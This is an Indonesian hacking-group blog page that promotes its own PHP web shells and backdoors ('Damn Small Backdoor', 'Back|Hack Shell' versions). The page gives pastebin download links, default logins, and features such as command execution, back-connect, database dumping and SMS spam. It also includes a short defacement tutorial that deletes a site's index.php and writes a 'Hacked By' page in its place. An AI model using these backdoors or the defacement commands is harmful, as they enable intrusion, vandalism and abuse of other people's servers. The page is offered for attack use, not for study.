• Defacing - Exploiting - Cracking - Scam - Social Engineering - All About Hacking

Damn Small Backdoor

Assalamu'alaikum wr.wb
Hai guys gw bikin backdoor lagi nih.
namanya "Damn Small Backdoor" kenapa namanya gitu?
Soalnya backdoor ini cuma terdiri kurang dari 100 line
dan berukuran kurang dari 3kb aja. Tapi shell ini hanya
bekerja pada server yang support function system() atau
execute command. Karena shell ini berbasis command. Jadi
itung" juga buat test skill juga wkwkwk. Oke langsung aja
kaya gini tampilannya..

Damn Small Backdoor

About DSB
Feature :
-Home
-About
-Auto Scan Dir
-Auto Change Dir

Tutorial tebas index dengan Damn Small Backdoor :
1. Pindah ke directory root dulu. (public_html)
2. Execute command berikut:
-rm index.php
-echo "<title>Hacked By ...</title><h1>Hacked By ...</h1>" >> index.php

Atau ketik 'dsb' untuk memunculkan tutorial
Oke segini dulu wkwkwk. Byee...

Download ==> https://pastebin.com/raw/hMVwQ3TH

<-- Mini BackHack Shell -->

Assalamu'alaikum Wr. Wb.
Hai temen" w abis bikin shell lagi nih.
Tapi versi kecil. Fiturnya ya cuma mini..
Tenang gaada loggernya kok. Bisa di decode sendiri.

Begini tampilannya:
<-- Mini BackHack Shell -->



Download disini => https://pastebin.com/raw/XcwBBEdj

Copyright (c) 2018 Sora Cyber Team 

<< Back|Hack Shell IV [Final]

Assalamu'alaikum Wr. Wb.
Kali ini w mau rilis << Back|Hack Shell IV [Final]
Dengan fitur" baru + fix fitur" yang rusak sebelumnya :D

Langsung aja ini tampilannya :D

Tampilan Login

Setelah Login

<< Back|Hack Shell IV [Final]
Coded By Cy#b3r00T

Feature:
-Home
-Adminer
-Shell Spawner
-Command Execute
-PHP Info
-Socket Server
-Jumping [Super Mode]
-Symlink
-Hash Generator
-Hash Identify
-Spam SMS [Indonesian Number]
-Database Dump
-Encode/Decode PHP
-BackConnect
-Shell Finder
-Mailer
-Reverse IP
-About
-Admin Finder
-Kill + Fix Bug, Fitur sudah di remaster jadi makin top:)

Login Detail:
username: "root"
password: "turnbackhack"

Need Help?
Contact:
soracyberteam@gmail.com
Instagram: @cy_b3r00t

Download:
Click Here :D

<< Back|Hack Shell II [Release] By Cy#b3r00T

Assalamua'alaikum Wr.Wb.

Hai guys! Kembali lagi bersama w Cy#b3r00T.
Maaf jarang update hehe.
Kali ini w mau share shell hasil karya w nih.
Namanya <<Back|Hack Shell II.

Oke langsung aja ini penampakannya:)

Tampilan Login

Seteah Login  
 



<< Back|Hack Shell II [Release]
Coded By Cy#b3r00T

Feature:
-Home
-Command Execute
-PHP Info
-Socket Server
-Jumping [Super Mode]
-Symlink
-Hash Generator
-Hash Identify
-Spam SMS [Indonesian Number]
-Database Dump
-Encode/Decode PHP
-BackConnect
-Shell Finder
-Mailer
-Reverse IP
-About
-Kill

Login Detail:
username: "root"
password: "turnbackhack"

Need Help?
Contact:
soracyberteam@gmail.com
Instagram: @cy_b3r00t

Download:
Click Here :)

Deface Web Apa Saja Dengan Linux!! (2018)

Langsung aja liat bokepnya.
*Eh Videonya :v
 
Sora Cyber Team © 2011 Templates | uzanc